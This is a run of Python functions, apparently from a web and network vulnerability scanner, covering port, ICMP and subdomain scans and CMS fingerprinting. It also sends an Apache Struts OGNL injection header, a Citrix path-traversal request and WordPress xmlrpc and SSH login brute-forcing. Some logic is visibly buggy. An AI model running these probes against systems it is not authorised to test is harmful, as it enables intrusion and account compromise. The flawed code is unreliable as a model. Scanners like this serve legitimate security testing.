def apache_struts(target, port, timeout_sec, log_in_file, language, time_sleep, thread_tmp_filename, socks_proxy, scan_id, scan_cmd): try: s = conn(target, port, timeout_sec, socks_proxy) if not s: return False else: if target_type(target) != "HTTPS" and port == 443: # type == "HTTPS". target = 'https://' + target if target_type(target) != "HTTP" and port == 80: target = 'http://' + target random_string = ''.join(random.choice( 'abcdefghijklmnopqrstuvwxyz') for i in range(7)) payload = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']." payload += "addHeader('%s','%s')}.multipart/form-data" % ( random_string, random_string) headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'Content-Type': str(payload), 'Accept': '*/*' } timeout = 3 resp = requests.get( target, headers=headers, verify=False, timeout=timeout, allow_redirects=False) if ((random_string in list(resp.headers.keys())) and (resp.headers[random_string] == random_string)): return True else: return False except Exception as e: # some error warning return False
def xss_protection(target, port, timeout_sec, log_in_file, language, time_sleep, thread_tmp_filename, socks_proxy, scan_id, scan_cmd): regex = '1; report=' + 'https?:\/\/(www\.)?[-a-zA-Z0-9]{1,256}\.[-a-zA-Z0-9]{1,6}' try: s = conn(target, port, timeout_sec, socks_proxy) if not s: return False else: if target_type(target) != "HTTP" and port == 443: target = 'https://' + target if target_type(target) != "HTTP" and port == 80: target = 'http://' + target req = requests.get(target) try: if req.headers['X-XSS-Protection'] == '1; mode=block': return False elif req.header['X-XSS-Protection'] == '1': return False elif re.match(regex, req.header['X-XSS-Protection']): return False else: return True except: return True except Exception as e: # some error warning return False
def xmlrpc_bruteforce(target, port, timeout_sec, log_in_file, language, time_sleep, thread_tmp_filename, socks_proxy, scan_id, scan_cmd): try: s = conn(target, port, timeout_sec, socks_proxy) if not s: return False else: headers = {} if target_type(target) != "HTTP" and port == 443: target = 'https://' + target if target_type(target) != "HTTP" and port == 80: target = 'http://' + target headers['Content-Type'] = 'text/xml' postdata = '''<methodCall><methodName>wp.getUsersBlogs</methodName><params> <param><value><string>admin</string></value></param> <param><value><string></string></value></param> </params></methodCall>''' req = requests.post(target + '/xmlrpc.php', data=postdata, headers=headers) if re.search('<int>403</int>', req.text): return True else: return False except Exception as e: return False
def start(target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, methods_args, scan_id, scan_cmd): # Main function if target_type(target) != 'SINGLE_IPv4' or target_type( target) != 'DOMAIN' or target_type( target) != 'HTTP' or target_type(target) != 'SINGLE_IPv6': # rand useragent http_methods = ["GET", "HEAD"] # requirements check new_extra_requirements = extra_requirements_dict() if methods_args is not None: for extra_requirement in extra_requirements_dict(): if extra_requirement in methods_args: new_extra_requirements[extra_requirement] = methods_args[ extra_requirement] extra_requirements = new_extra_requirements if extra_requirements["pma_scan_http_method"][0] not in http_methods: warn(messages(language, "dir_scan_get")) extra_requirements["pma_scan_http_method"] = ["GET"] thread_tmp_filename = '{}/tmp/thread_tmp_'.format( load_file_path()) + ''.join( random.choice(string.ascii_letters + string.digits) for _ in range(20)) __log_into_file(thread_tmp_filename, 'w', '1', language) default_ports = [80, 443] request = """{0} __target_locat_here__{{0}} HTTP/1.1\nUser-Agent: {1}\n\n""".format( extra_requirements["pma_scan_http_method"][0], random.choice(user_agents_list()) if extra_requirements["pma_scan_random_agent"][0].lower() == "true" else "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5" ) status_codes = [200, 401, 403] condition = "response.status_code in {0}".format(status_codes) message = messages(language, 'found') sample_message = "\"" + message + "\"" + """.format(response.url, response.status_code, response.reason)""" sample_event = { 'HOST': target_to_host(target), 'USERNAME': '', 'PASSWORD': '', 'PORT': 'PORT', 'TYPE': 'pma_scan', 'DESCRIPTION': sample_message, 'TIME': now(), 'CATEGORY': "scan", 'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd } counter_message = messages(language, "phpmyadmin_dir_404") __repeater(request, [extra_requirements["pma_scan_list"]], timeout_sec, thread_number, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, scan_id, scan_cmd, condition, thread_tmp_filename, sample_event, sample_message, target, ports, default_ports, counter_message) else: warn( messages(language, "input_target_error").format('pma_scan', target))
def drupal_version(target, port, timeout_sec, log_in_file, language, time_sleep, thread_tmp_filename, socks_proxy, scan_id, scan_cmd): try: s = conn(target, port, timeout_sec, socks_proxy) if not s: return False else: if target_type(target) != "HTTP" and port == 443: target = 'https://' + target if target_type(target) != "HTTP" and port == 80: target = 'http://' + target req = requests.get(target + '/CHANGELOG.txt') try: regex = 'Drupal (\d+\.\d+),' pattern = re.compile(regex) version = re.findall(pattern, req.text) if version: return version[0] else: return False except Exception: return False except Exception: # some error warning return False
def wp_user_enum(target, port, timeout_sec, log_in_file, language, time_sleep, thread_tmp_filename, socks_proxy, scan_id, scan_cmd): try: s = conn(target, port, timeout_sec, socks_proxy) if not s: return False else: if target_type(target) != "HTTP" and port == 443: target = 'https://' + target if target_type(target) != "HTTP" and port == 80: target = 'http://' + target r = requests.get(target+'/?feed=rss2', verify = False) r2 = requests.get(target+'/?author=', verify = False) try: global wp_users wp_users_feed = re.findall("<dc:creator><!\[CDATA\[(.+?)\]\]></dc:creator>", r.text, re.IGNORECASE) wp_users_admin = re.findall("author author-(.+?) ", r2.text, re.IGNORECASE) wp_users_admin2 = re.findall("/author/(.+?)/feed/", r2.text, re.IGNORECASE) wp_users = wp_users_feed + wp_users_admin + wp_users_admin2 wp_users = sorted(set(wp_users)) wp_users = ', '.join(wp_users) if wp_users is not "": return True else: return False except: return False except Exception as e: # some error warning return False
def options_method(target, port, timeout_sec, log_in_file, language, time_sleep, thread_tmp_filename, socks_proxy, scan_id, scan_cmd): try: s = conn(target, port, timeout_sec, socks_proxy) if not s: return False else: if target_type(target) != "HTTP" and port == 443: target = 'https://' + target if target_type(target) != "HTTP" and port == 80: target = 'http://' + target req = requests.options(target) if req.status_code == 200: try: global header header = req.headers['allow'] return True except Exception: return False else: return False except Exception as e: # some error warning return False
def drupal_modules(target, port, timeout_sec, log_in_file, language, time_sleep, thread_tmp_filename, socks_proxy, scan_id, scan_cmd): try: s = conn(target, port, timeout_sec, socks_proxy) if not s: return False else: if target_type(target) != "HTTP" and port == 443: target = 'https://' + target if target_type(target) != "HTTP" and port == 80: target = 'http://' + target req = requests.get(target) try: modules = re.findall("/modules/(.+?)/", req.text, re.IGNORECASE) if modules: return ', '.join(list(set(modules))) else: return False except Exception: return False except Exception: # some error warning return False
def joomla_template(target, port, timeout_sec, log_in_file, language, time_sleep, thread_tmp_filename, socks_proxy, scan_id, scan_cmd): try: s = conn(target, port, timeout_sec, socks_proxy) if not s: return False else: if target_type(target) != "HTTP" and port == 443: target = 'https://' + target if target_type(target) != "HTTP" and port == 80: target = 'http://' + target r = requests.get(target, verify=False) r2 = requests.get(target + '/administrator/', verify=False) try: global web_template global admin_template web_template = ''.join( set(re.findall("/templates/(.+?)/", r.text, re.IGNORECASE))) admin_template = ''.join( set( re.findall("/administrator/templates/(.+?)/", r2.text, re.IGNORECASE))) if web_template is not "" or admin_template is not "": return True else: return False except Exception: return False except Exception as e: # some error warning return False
def joomla_version(target, port, timeout_sec, log_in_file, language, time_sleep, thread_tmp_filename, socks_proxy, scan_id, scan_cmd): try: s = conn(target, port, timeout_sec, socks_proxy) if not s: return False else: if target_type(target) != "HTTP" and port == 443: target = 'https://' + target if target_type(target) != "HTTP" and port == 80: target = 'http://' + target req = requests.get(target + '/joomla.xml') if req.status_code == 404: req = requests.get(target + '/administrator/manifests/files/joomla.xml') try: global version regex = '<version>(.+?)</version>' pattern = re.compile(regex) version = re.findall(pattern, req.text) version = ''.join(version) return True except: return False except Exception as e: # some error warning return False
def http_cors(target, port, timeout_sec, log_in_file, language, time_sleep, thread_tmp_filename, socks_proxy, scan_id, scan_cmd): try: s = conn(target, port, timeout_sec, socks_proxy) if not s: return False else: if target_type(target) != "HTTP" and port == 443: target = 'https://' + target if target_type(target) != "HTTP" and port == 80: target = 'http://' + target headers = { 'Referer': 'http://example.foo/CORSexample1.html', 'Origin': 'http://example.foo', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0' } req = requests.get(target, headers=headers) if req.headers['Access-Control-Allow-Origin'] == "*": return True else: return False except Exception as e: # some error warning return False
def start(target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, language, verbose_level, show_version, socks_proxy, retries, ping_flag, scan_id, scan_cmd): # Main function readDevices() global debug global scanid global scancmd global lang global loginfile scanid = scan_id scancmd = scan_cmd lang = language loginfile = log_in_file debug = verbose_level if target_type(target) != 'SINGLE_IPv4' or target_type( target) != 'DOMAIN' or target_type(target) != 'HTTP': threads = [] if ports is not None: for port in ports: t = threading.Thread(target=check, args=( { 'ip': target, 'stage': '' }, port, )) threads.append(t) t.start() else: check({'ip': target, 'stage': ''}, httpPort) for t in threads: t.join()
def wordpress_version(target, port, timeout_sec, log_in_file, language, time_sleep, thread_tmp_filename, socks_proxy, scan_id, scan_cmd): try: s = conn(target, port, timeout_sec, socks_proxy) if not s: return False else: if target_type(target) != "HTTP" and port == 443: target = 'https://' + target if target_type(target) != "HTTP" and port == 80: target = 'http://' + target try: req = requests.get(target+'/wp-admin/') except: return False try: global version regex = 'ver=.*\d' pattern = re.compile(regex) version = re.findall(pattern, req.text) version = max(set(version), key=version.count).replace( 'ver=', '') return True except: return False except Exception as e: # some error warning return False
def connect(host, port, timeout_sec, log_in_file, language, time_sleep, thread_tmp_filename, socks_proxy, scan_cmd, scan_id): time.sleep(time_sleep) try: if socks_proxy is not None: socks_version = socks.SOCKS5 if socks_proxy.startswith( 'socks5://') else socks.SOCKS4 socks_proxy = socks_proxy.rsplit('://')[1] if '@' in socks_proxy: socks_username = socks_proxy.rsplit(':')[0] socks_password = socks_proxy.rsplit(':')[1].rsplit('@')[0] socks.set_default_proxy( socks_version, str(socks_proxy.rsplit('@')[1].rsplit(':')[0]), int(socks_proxy.rsplit(':')[-1]), username=socks_username, password=socks_password) socket.socket = socks.socksocket socket.getaddrinfo = getaddrinfo else: socks.set_default_proxy(socks_version, str(socks_proxy.rsplit(':')[0]), int(socks_proxy.rsplit(':')[1])) socket.socket = socks.socksocket socket.getaddrinfo = getaddrinfo if target_type(host) == "SINGLE_IPv6": s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM, 0) else: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) if timeout_sec is not None: s.settimeout(timeout_sec) if target_type(host) == "SINGLE_IPv6": s.connect((host, port, 0, 0)) else: s.connect((host, port)) s.close() info(messages(language, 80).format(host, port)) save = open(log_in_file, 'a') save.write( json.dumps({ 'HOST': host, 'USERNAME': '', 'PASSWORD': '', 'PORT': port, 'TYPE': 'tcp_connect_port_scan', 'DESCRIPTION': messages(language, 79), 'TIME': now(), 'CATEGORY': "scan", 'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd }) + '\n') save.close() thread_write = open(thread_tmp_filename, 'w') thread_write.write('0') thread_write.close() return True except: return False
def start(target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language, verbose_level, show_version, check_update, socks_proxy, retries, ping_flag, methods_args, scan_id, scan_cmd): # Main function from core.targets import target_type from core.targets import target_to_host if target_type(target) != 'SINGLE_IPv4' or target_type(target) != 'DOMAIN' or target_type(target) != 'HTTP': # requirements check new_extra_requirements = extra_requirements_dict() if methods_args is not None: for extra_requirement in extra_requirements_dict(): if extra_requirement in methods_args: new_extra_requirements[extra_requirement] = methods_args[extra_requirement] extra_requirements = new_extra_requirements if target_type(target) == 'HTTP': target = target_to_host(target) if ping_flag and do_one_ping(target, timeout_sec, 8) is None: if socks_proxy is not None: socks_version = socks.SOCKS5 if socks_proxy.startswith('socks5://') else socks.SOCKS4 socks_proxy = socks_proxy.rsplit('://')[1] if '@' in socks_proxy: socks_username = socks_proxy.rsplit(':')[0] socks_password = socks_proxy.rsplit(':')[1].rsplit('@')[0] socks.set_default_proxy(socks_version, str(socks_proxy.rsplit('@')[1].rsplit(':')[0]), int(socks_proxy.rsplit(':')[-1]), username=socks_username, password=socks_password) socket.socket = socks.socksocket socket.getaddrinfo = getaddrinfo else: socks.set_default_proxy(socks_version, str(socks_proxy.rsplit(':')[0]), int(socks_proxy.rsplit(':')[1])) socket.socket = socks.socksocket socket.getaddrinfo = getaddrinfo warn(messages(language, 100).format(target, 'subdomain_scan')) return None subs = __get_subs(target, timeout_sec, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, num, total, extra_requirements=extra_requirements) info(messages(language, 135).format(len(subs), ', '.join(subs) if len(subs) > 0 else 'None')) if len(subs) is not 0: save = open(log_in_file, 'a') save.write( json.dumps({'HOST': target, 'USERNAME': '', 'PASSWORD': '', 'PORT': '', 'TYPE': 'subdomain_scan', 'DESCRIPTION': messages(language, 135).format(len(subs), ', '.join(subs) if len(subs) > 0 else 'None'), 'TIME': now(), 'CATEGORY': "scan", 'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd}) + '\n') save.close() if len(subs) is 0 and verbose_level is not 0: save = open(log_in_file, 'a') save.write( json.dumps({'HOST': target, 'USERNAME': '', 'PASSWORD': '', 'PORT': '', 'TYPE': 'subdomain_scan', 'DESCRIPTION': messages(language, 135).format(len(subs), ', '.join(subs) if len(subs) > 0 else 'None'), 'TIME': now(), 'CATEGORY': "scan", 'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd}) + '\n') save.close() return subs else: warn(messages(language, 69).format('subdomain_scan', target)) return []
def start(target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, methods_args, scan_id, scan_cmd): if target_type(target) != 'SINGLE_IPv4' or target_type(target) != 'DOMAIN' or target_type( target) != 'HTTP' or target_type(target) != 'SINGLE_IPv6': if socks_proxy is not None: socks_version = socks.SOCKS5 if socks_proxy.startswith( 'socks5://') else socks.SOCKS4 socks_proxy = socks_proxy.rsplit('://')[1] if '@' in socks_proxy: socks_username = socks_proxy.rsplit(':')[0] socks_password = socks_proxy.rsplit(':')[1].rsplit('@')[0] socks.set_default_proxy(socks_version, str(socks_proxy.rsplit('@')[1].rsplit(':')[0]), int(socks_proxy.rsplit(':')[-1]), username=socks_username, password=socks_password) socket.socket = socks.socksocket socket.getaddrinfo = getaddrinfo else: socks.set_default_proxy(socks_version, str(socks_proxy.rsplit(':')[0]), int(socks_proxy.rsplit(':')[1])) socket.socket = socks.socksocket socket.getaddrinfo = getaddrinfo n = 0 # warning for each target make the screen so messy in IP ranges # warn(messages(language,"root_required")) while 1: r = do_one_ping(target, timeout_sec, 84) if r is None: n = n + 1 if n == retries: if verbose_level > 3: warn(messages(language, "host_down").format(target)) if verbose_level != 0: data = json.dumps({'HOST': target, 'USERNAME': '', 'PASSWORD': '', 'PORT': '', 'TYPE': 'icmp scan', 'DESCRIPTION': messages(language, "host_down").format(target), 'TIME': now(), 'CATEGORY': "scan", 'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd}) + "\n" __log_into_file(log_in_file, 'a', data, language) break else: pass else: info(messages(language, "host_up").format( target, str(round(r * 1000, 2)) + "ms")) data = json.dumps({'HOST': target, 'USERNAME': '', 'PASSWORD': '', 'PORT': '', 'TYPE': 'icmp scan', 'DESCRIPTION': messages(language, "host_up").format(target, str(round(r * 1000, 2)) + "ms"), 'TIME': now(), 'CATEGORY': "scan", 'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd}) + "\n" __log_into_file(log_in_file, 'a', data, language) break else: warn(messages(language, "input_target_error").format('icmp_scan', target))
def connect(host, port, timeout_sec, log_in_file, language, time_sleep, thread_tmp_filename, socks_proxy, scan_id, scan_cmd, stealth_flag): try: if socks_proxy is not None: socks_version = socks.SOCKS5 if socks_proxy.startswith( 'socks5://') else socks.SOCKS4 socks_proxy = socks_proxy.rsplit('://')[1] if '@' in socks_proxy: socks_username = socks_proxy.rsplit(':')[0] socks_password = socks_proxy.rsplit(':')[1].rsplit('@')[0] socks.set_default_proxy(socks_version, str(socks_proxy.rsplit('@')[1].rsplit(':')[0]), int(socks_proxy.rsplit(':')[-1]), username=socks_username, password=socks_password) socket.socket = socks.socksocket socket.getaddrinfo = getaddrinfo else: socks.set_default_proxy(socks_version, str( socks_proxy.rsplit(':')[0]), int(socks_proxy.rsplit(':')[1])) socket.socket = socks.socksocket socket.getaddrinfo = getaddrinfo if target_type(host) == "SINGLE_IPv6": s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM, 0) else: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) if timeout_sec is not None: s.settimeout(timeout_sec) try: service_name = "/" + socket.getservbyport(port) except Exception: service_name = "" if target_type(host) == "SINGLE_IPv6": s.connect((host, port, 0, 0)) else: s.connect((host, port)) info(messages(language, "port_found").format(host, str(port) + service_name, "TCP_CONNECT"), log_in_file, "a", {'HOST': host, 'USERNAME': '', 'PASSWORD': '', 'PORT': port, 'TYPE': 'port_scan', 'DESCRIPTION': messages(language, "port/type").format(str(port) + service_name, "TCP_CONNECT"), 'TIME': now(), 'CATEGORY': "scan", 'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd}, language, thread_tmp_filename) s.close() return True except socket.timeout: try: if filter_port(host, port): info(messages(language, "port_found").format(host, str(port) + service_name, "TCP_CONNECT")) data = json.dumps({'HOST': host, 'USERNAME': '', 'PASSWORD': '', 'PORT': port, 'TYPE': 'port_scan', 'DESCRIPTION': messages(language, "port/type").format(str(port) + service_name, "TCP_CONNECT"), 'TIME': now(), 'CATEGORY': "scan", 'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd}) + '\n' __log_into_file(log_in_file, 'a', data, language) __log_into_file(thread_tmp_filename, 'w', '0', language) except: pass except: return False
def graphql(target, port, timeout_sec, socks_proxy): try: s = conn(target_to_host(target), port, timeout_sec, socks_proxy) if not s: return False else: if target_type(target) != "HTTP" and port == 443: target = 'https://' + target if target_type(target) != "HTTP" and port == 80: target = 'http://' + target headers = { "User-Agent": random.choice(useragents()), "Accept": "text/html,application/xhtml+xml,application/xml; q=0.9,image/webp,image/apng,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.9", "Accept-Encoding": "gzip, deflate, br", } query = """{ __schema { types { name } } } """ params = {"query": query, "variables": "{}"} tempTarget = target global final_endpoint final_endpoint = '' for endpoint in graphql_list(): tempTarget += endpoint try: req = requests.post(tempTarget, json=params, headers=headers, verify=False, timeout=timeout_sec) tempTarget = target except Exception: return False else: if req.status_code == 200: json_data = json.loads(req.text) if json_data.get('data') or json_data.get('errors'): return True return False except Exception: # some error warning return False
def start(target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, methods_args, scan_id, scan_cmd): # Main function from core.targets import target_type from core.targets import target_to_host if target_type(target) != 'SINGLE_IPv4' or target_type(target) != 'DOMAIN' or target_type( target) != 'HTTP' or target_type(target) != 'SINGLE_IPv6': # requirements check new_extra_requirements = extra_requirements_dict() if methods_args is not None: for extra_requirement in extra_requirements_dict(): if extra_requirement in methods_args: new_extra_requirements[ extra_requirement] = methods_args[extra_requirement] extra_requirements = new_extra_requirements if target_type(target) == 'HTTP': target = target_to_host(target) subs = __get_subs(target, timeout_sec, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, num, total, extra_requirements=extra_requirements) if len(subs) == 0: info(messages(language, "no_subdomain_found")) if len(subs) != 0: info(messages(language, "len_subdomain_found").format(len(subs))) for sub in subs: if("<br>" in sub): for i in sub.lower().split("<br>"): if verbose_level > 2: info(messages(language, "subdomain_found").format(sub)) data = json.dumps({'HOST': target, 'USERNAME': '', 'PASSWORD': '', 'PORT': '', 'TYPE': 'subdomain_scan', 'DESCRIPTION': i, 'TIME': now(), 'CATEGORY': "scan", 'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd}) + "\n" __log_into_file(log_in_file, 'a', data, language) else: if verbose_level > 2: info(messages(language, "subdomain_found").format(sub)) data = json.dumps({'HOST': target, 'USERNAME': '', 'PASSWORD': '', 'PORT': '', 'TYPE': 'subdomain_scan', 'DESCRIPTION': sub, 'TIME': now(), 'CATEGORY': "scan", 'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd}) + "\n" __log_into_file(log_in_file, 'a', data, language) if len(subs) == 0 and verbose_level != 0: data = json.dumps({'HOST': target, 'USERNAME': '', 'PASSWORD': '', 'PORT': '', 'TYPE': 'subdomain_scan', 'DESCRIPTION': messages(language, "subdomain_found").format(len(subs), ', '.join(subs) if len(subs) > 0 else 'None'), 'TIME': now(), 'CATEGORY': "scan", 'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd}) + "\n" __log_into_file(log_in_file, 'a', data, language) return subs else: warn(messages(language, "input_target_error").format( 'subdomain_scan', target)) return []
def start(target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, language, verbose_level, show_version , socks_proxy, retries, ping_flag, scan_id, scan_cmd): # Main function threads = [] if target_type(target) != 'SINGLE_IPv4' or target_type(target) != 'DOMAIN' or target_type(target) != 'HTTP': if ports is not None: for port in ports: t = threading.Thread(target=check, args=(target, int(port), language, scan_id, scan_cmd, log_in_file, timeout_sec,)) threads.append(t) t.start() else: check(target, PORT, language, scan_id, scan_cmd, log_in_file, timeout_sec) for t in threads: t.join()
def cms_detection(target, port, timeout_sec, log_in_file, language, time_sleep, thread_tmp_filename, socks_proxy, scan_id, scan_cmd): try: try: s = conn(target, port, timeout_sec, socks_proxy) except Exception: return False if not s: return False else: global cms_name if target_type(target) != "HTTP" and port == 443: target = 'https://' + target if target_type(target) != "HTTP" and port == 80: target = 'http://' + target req_url = target + "/N0WH3R3.php" req_joomla_url = target + "/configuration.php" req_wordpress_url = target + "/wp-config.php" req_drupal_url = target + "/sites/default/settings.php" try: req = requests.get(req_url, timeout=10, headers=USER_AGENT) code_for_404 = req.text req_wordpress = requests.get(req_wordpress_url, timeout=10, headers=USER_AGENT) req_joomla = requests.get(req_joomla_url, timeout=10, headers=USER_AGENT) req_drupal = requests.get(req_drupal_url, timeout=10, headers=USER_AGENT) except requests.exceptions.RequestException: return False if req_wordpress.text != code_for_404 or req_wordpress.status_code == 403: cms_name = "Wordpress" return True elif req_drupal.status_code != code_for_404 or req_drupal.status_code == 403: cms_name = "Drupal" return True elif req_joomla.status_code != code_for_404 or req_joomla.status_code == 403: cms_name = "Joomla" return True else: return False except Exception as e: #print(e) return False
def new_scan(): """ new scan through the API Returns: a JSON message with scan details if success otherwise a JSON error """ _start_scan_config = {} __api_key_check(app, flask_request, __language()) targetValue = __get_value(flask_request, "targets") if (target_type(targetValue) == "UNKNOWN"): return jsonify({"error": "Please input correct target"}), 400 for key in _core_default_config(): if __get_value(flask_request, key) is not None: _start_scan_config[key] = escape(__get_value(flask_request, key)) _start_scan_config["backup_ports"] = __get_value(flask_request, "ports") _start_scan_config = __rules( __remove_non_api_keys( _builder(_start_scan_config, _builder(_core_config(), _core_default_config()))), _core_default_config(), __language()) _p = multiprocessing.Process(target=__scan, args=[_start_scan_config]) _p.start() # Sometimes method_args is too big! _start_scan_config["methods_args"] = {"as_user_set": "set_successfully"} return jsonify(_start_scan_config), 200
def target_builder(target, ports, default_ports): """ build HTTP target type from host or any! Args: target: raw target ports: ports array default_ports: default ports in case user not entered, in array type Returns: [] if cannot open URL, otherwise a list of valid URLs """ methods = ["http", "https"] if not ports: ports = default_ports URL = [] if target_type(target) != "HTTP": for port in ports: for method in methods: if simple_test_open_url(method + "://" + target + ":" + str(port) + "/"): URL.append(method + "://" + target + ":" + str(port)) else: if not simple_test_open_url(target): return [] URL.append(target) return URL
def check(user, passwd, target, port, headers, timeout_sec, log_in_file, language, retries, time_sleep, thread_tmp_filename, socks_proxy, scan_id, scan_cmd): time.sleep(time_sleep) try: if socks_proxy is not None: socks_version = socks.SOCKS5 if socks_proxy.startswith( 'socks5://') else socks.SOCKS4 socks_proxy = socks_proxy.rsplit('://')[1] if '@' in socks_proxy: socks_username = socks_proxy.rsplit(':')[0] socks_password = socks_proxy.rsplit(':')[1].rsplit('@')[0] socks.set_default_proxy(socks_version, str(socks_proxy.rsplit('@')[1].rsplit(':')[0]), int(socks_proxy.rsplit(':')[-1]), username=socks_username, password=socks_password) socket.socket = socks.socksocket socket.getaddrinfo = getaddrinfo else: socks.set_default_proxy(socks_version, str( socks_proxy.rsplit(':')[0]), int(socks_proxy.rsplit(':')[1])) socket.socket = socks.socksocket socket.getaddrinfo = getaddrinfo n = 0 while 1: try: if target_type(target) != "HTTP" and port == 443: target = 'https://' + target if target_type(target) != "HTTP" and port == 80: target = 'http://' + target target = target + '/xmlrpc.php' postdata = '''<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>'''+ user +'''</string></value></param><param><value><string>'''+ passwd + '''</string></value></param></params></methodCall>''' r = requests.post( target, timeout = timeout_sec, headers = headers, data = postdata) if "incorrect" not in r.text.lower() and user in r.text.lower(): info(messages(language, "user_pass_found").format( user, passwd, target, port)) data = json.dumps({'HOST': target, 'USERNAME': user, 'PASSWORD': passwd, 'PORT': port, 'TYPE': 'wp_xmlrpc_brute', 'DESCRIPTION': messages(language, "login_successful"), 'TIME': now(), 'CATEGORY': "brute"}) + "\n" __log_into_file(log_in_file, 'a', data, language) break except: n += 1 if n == retries: warn(messages(language, "http_connection_timeout").format(target)) return 1 return True except: return False
def sub_takeover( target, port, timeout_sec, log_in_file, language, time_sleep, thread_tmp_filename, socks_proxy, scan_id, scan_cmd, extra_requirement, ): try: s = conn(target, port, timeout_sec, socks_proxy) if not s: return False else: if target_type(target) != "HTTP" and port == 443: target = "https://" + target if target_type(target) != "HTTP" and port == 80: target = "http://" + target headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome 63.0.3239.132 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml; q=0.9,image/webp,image/apng,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.9", "Accept-Encoding": "gzip, deflate, br", } req = requests.get(target, headers=headers, verify=False, timeout=timeout_sec) for key, value in extra_requirement[ "subdomain_takeover_list"].items(): if version() == 2: if (value[0].decode('utf-8').lower() in req.text.decode('utf-8').lower()): return key else: if (value[0].lower() in req.text.lower()): return key return False except Exception as e: # some error warning return False
def start(target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language, verbose_level, show_version, check_update, proxies, retries): # Main function if target_type(target) != 'SINGLE_IPv4' or target_type(target) != 'DOMAIN': threads = [] max = thread_number total_req = len(users) * len(passwds) for port in ports: # test ssh trying = 0 portflag = True exit = 0 while 1: try: ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) if timeout_sec is not None: ssh.connect(target, username='', password='', timeout=timeout_sec) else: ssh.connect(target, username='', password='') exit = 0 break except paramiko.ssh_exception.AuthenticationException, ssherr: if 'Authentication failed.' in ssherr: break else: exit += 1 if exit is retries: error( messages(language, 77).format(target, port, str(num), str(total))) portflag = False break except: exit += 1 if exit is 3: error( messages(language, 77).format(target, port, str(num), str(total))) portflag = False break
def citrix_vuln(target, port, timeout_sec, log_in_file, language, time_sleep, thread_tmp_filename, socks_proxy, scan_id, scan_cmd): try: s = conn(target, port, timeout_sec, socks_proxy) if not s: if verbose_level > 4: warn('unable to connect to: {} on port: {} timeout: {}'.format( target, port, timeout_sec)) return False else: if target_type(target) != "HTTP" and port == 443: target = 'https://' + target if target_type(target) != "HTTP" and port == 80: target = 'http://' + target user_agent_list = [ "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0", "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Ubuntu/10.04", "Mozilla/5.0 (Linux; Android 9; Mi A3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Mobile Safari/537.36" ] user_agent = {'User-agent': random.choice(user_agent_list)} # as a pre-requisite check that CSS return the word citrix req0_url = target + '/vpn/js/rdx/core/css/rdx.css' req0 = requests.get(req0_url, timeout=10, headers=user_agent, verify=False) if req0.status_code == 200 and 'citrix' in req0.text.lower(): info('Citrix appliance detected: ' + target) # now check if response code 200 is returned for the following url: req_url = target + '/vpn/../vpns/cfg/smb.conf' req = requests.get(req_url, timeout=10, headers=user_agent, verify=False) if req.status_code == 200 and 'lmhosts' in req.text.lower(): return True else: return False else: return False except Exception as e: # some error warning return False
def content_policy(target, port, timeout_sec, log_in_file, language, time_sleep, thread_tmp_filename, socks_proxy, scan_id, scan_cmd, check_source_flag): try: s = conn(target, port, timeout_sec, socks_proxy) global weak weak = False if not s: return False else: if target_type(target) != "HTTP" and port == 443: target = 'https://' + target if target_type(target) != "HTTP" and port == 80: target = 'http://' + target headers = {'User-agent': random.choice(useragents.useragents())} req = requests.get(target, headers=headers, timeout=timeout_sec, verify=False) try: weak = False csp = req.headers['Content-Security-Policy'] if 'unsafe-inline' in csp or 'unsafe-eval' in csp: weak = True return False except Exception as e: if check_source_flag: soup = BeautifulSoup(req.text, "html.parser") meta_tags = soup.find_all( 'meta', {'http-equiv': 'Content-Security-Policy'}) if len(meta_tags) == 0: return True directives = meta_tags[0].attrs['content'] if 'unsafe-inline' in directives or 'unsafe-eval' in directives: weak = True return False else: return True except Exception as e: # some error warning return False
